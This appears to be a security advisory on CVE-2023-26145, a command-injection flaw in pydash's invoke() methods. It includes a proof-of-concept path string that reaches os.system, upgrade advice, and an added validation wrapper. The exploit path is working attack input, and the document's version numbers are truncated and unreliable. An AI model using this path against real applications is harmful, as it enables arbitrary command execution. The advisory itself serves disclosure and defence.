A security vulnerability has been discovered in the popular Python library pydash. The vulnerability identified as CVE-2023-26145 affects versions of the package pydash before 6... This vulnerability allows an attacker to potentially execute arbitrary commands on the victim's system if specific prerequisites are satisfied.

In this long-read post, we will discuss the vulnerability, explain the prerequisites required, and provide references to the original sources.

Vulnerability Details

The vulnerability in pydash involves certain methods in the package, specifically pydash.objects.invoke() and pydash.collections.invoke_map(). These methods accept dotted paths (Deep Path Strings) to target nested Python objects, relative to the original source object. By exploiting these paths, an attacker can target internal class attributes and dict items to retrieve, modify or invoke nested Python objects.

Here is an example code snippet that demonstrates the use of the pydash.objects.invoke() method:

import pydash

class Foo:
    def bar(self, arg):
        return "Hello, " + arg

foo_instance = Foo()
result = pydash.objects.invoke(foo_instance, 'bar', 'World')
print(result)  # Output: Hello, World

The pydash.objects.invoke() method is vulnerable to Command Injection only when both of the following hold:

1) The source object (argument 1) is not a built-in object such as a list or dict (otherwise, the __init__.__globals__ path is not accessible)

2) The attacker has control over argument 2 (the path string) and argument 3 (the argument to pass to the invoked method)

The pydash.collections.invoke_map() method is also vulnerable, but it is harder to exploit because the attacker does not have direct control over the argument to be passed to the invoked function.

Exploit Example

In order to exploit the CVE-2023-26145 vulnerability, an attacker can use the following code snippet to execute arbitrary commands:

import pydash
import os

class Foo:
    pass

evil_path = '__class__.__init__.__globals__.' \
            'os.system'
evil_arg = 'echo "Hello, World" > evil_file.txt'

foo_instance = Foo()
pydash.objects.invoke(foo_instance, evil_path, evil_arg)

In this example, the invoke() method resolves the path to the os.system function in Python's os module and executes the command echo "Hello, World" > evil_file.txt, which creates a new file called evil_file.txt.

Mitigation

To mitigate this vulnerability, users of the pydash package should update to version 6.. or later, which contains the fix. You can update it using the following command:

pip install --upgrade pydash

Moreover, when the path string or the method arguments passed to these methods can come from untrusted input, always validate and sanitize them before the call.
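One way to enforce that validation, as an added example that is not from the original post or from the pydash project: reject any deep path that contains dunder or underscore-prefixed segments, or whose final segment (the method that will actually be called) is not on an explicit allowlist, before handing it to invoke(). The safe_invoke wrapper, the allowed_methods parameter and the path_segments helper are hypothetical names chosen for this example; only the wrapper needs pydash installed.

```python
import re
from typing import Iterable, List

# Each segment of an accepted deep path must be a plain identifier that does
# not start with an underscore, or a list index. Dunders such as __class__,
# _private names and backslash escapes all fail this pattern.
_SEGMENT = re.compile(r"[A-Za-z][A-Za-z0-9]*|[0-9]+")


def path_segments(path: str) -> List[str]:
    """Split a pydash-style deep path ('a.b[0].c', 'a["k"].b') into segments,
    so that a dunder hidden inside a bracketed key is inspected as well."""
    segments = []
    for raw in re.split(r"[.\[\]]", path):
        seg = raw.strip().strip("'\"")
        if seg:
            segments.append(seg)
    return segments


def is_safe_invoke_path(path: str, allowed_methods: Iterable[str]) -> bool:
    """True only if every segment is benign and the final segment, the method
    that invoke() will call, is on the caller's allowlist."""
    segments = path_segments(path)
    if not segments:
        return False
    if not all(_SEGMENT.fullmatch(seg) for seg in segments):
        return False
    return segments[-1] in set(allowed_methods)


def safe_invoke(obj, path: str, *args, allowed_methods: Iterable[str], **kwargs):
    """Validate an untrusted path before calling pydash.objects.invoke.
    Hypothetical wrapper for this example; assumes pydash is installed."""
    if not is_safe_invoke_path(path, allowed_methods):
        raise ValueError("rejected deep path: %r" % path)
    import pydash  # imported lazily so the validator itself has no dependency
    return pydash.objects.invoke(obj, path, *args, **kwargs)


if __name__ == "__main__":
    class Foo:
        def bar(self, arg):
            return "Hello, " + arg

    print(safe_invoke(Foo(), "bar", "World", allowed_methods={"bar"}))
    try:
        safe_invoke(Foo(), "__class__.__init__.__globals__.os.system",
                    "ignored", allowed_methods={"bar"})
    except ValueError as exc:
        print(exc)
```

The same check applies to the path argument of pydash.collections.invoke_map(); the allowlist should name only the methods the application intends to expose.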

References

1. CVE-2023-26145 - NIST National Vulnerability Database
2. PyPI - pydash 6..
3. GitHub - pydash/pydash: The kitchen sink of Python utility libraries for doing "stuff" in a functional way.

Conclusion

CVE-2023-26145 is a serious security vulnerability in the pydash package which allows an attacker to potentially execute arbitrary commands on the victim's system. Developers using this package should update to the latest version and be cautious when using the affected methods with untrusted inputs. As always, remember to sanitize and validate any inputs that could potentially contain malicious data.

Timeline

Published on: 09/28/2023 05:15:45 UTC
Last modified on: 11/07/2023 04:09:28 UTC